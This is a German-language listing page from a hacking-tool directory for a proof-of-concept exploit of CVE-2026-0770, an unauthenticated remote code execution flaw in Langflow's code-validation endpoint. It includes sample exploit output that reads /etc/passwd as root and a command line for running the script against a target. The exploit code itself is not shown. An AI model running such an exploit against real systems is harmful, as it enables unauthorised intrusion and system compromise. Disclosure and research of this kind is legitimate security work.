Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0770 — LangFlow RCE | CVE-2026-0770 | Proof-of-Concept | Kitploit
Tools/GitHubGitHub/ez4rd1x1/cve-2026-0770
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubez4rd1x1/cve-2026-0770

CVE-2026-0770

LangFlow RCE | CVE-2026-0770 | Proof-of-Concept

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0770: Langflow exec_globals Unauthentifizierte Remote-Codeausführung (PoC)

CVE Score: 9.8 Python Version

CVE-2026-0770 ist eine Schwachstelle für nicht authentifizierte Remote-Codeausführung (RCE), die Langflow betrifft.

Der Fehler beruht auf einer unzureichenden Eingabevalidierung bei der Verarbeitung des Parameters exec_globals, der an den Endpunkt /validate übergeben wird. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer nicht vertrauenswürdige globale Umgebungen während der Validierungsroutinen übergeben und so eine Remote-Codeausführung im Kontext des Benutzers root erreichen.


[!] Haftungsausschluss

WARNUNG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests, Bildungszwecke und defensive Forschung gedacht. Führen Sie es nicht gegen Ziele aus, die Ihnen nicht gehören oder für die Sie keine ausdrückliche, schriftliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


Details zur Schwachstelle

  • CVE-ID: CVE-2026-0770
  • Schwachstellentyp: Einbindung von Funktionalität aus einer nicht vertrauenswürdigen Kontrollsphäre (CWE-829) / Code-Injection
  • Betroffene Software: Langflow (Versionen vor dem Patch)
  • Auswirkungen: Vollständige Systemkompromittierung (RCE als root)
  • Erforderliche Privilegien: Keine (nicht authentifiziert)

Ausgabe


======================================================================
           Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1            
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200

======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================

Status Code : 200
Response Size: 1244 bytes

Installation & Verwendung

git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"
Tool herunterladen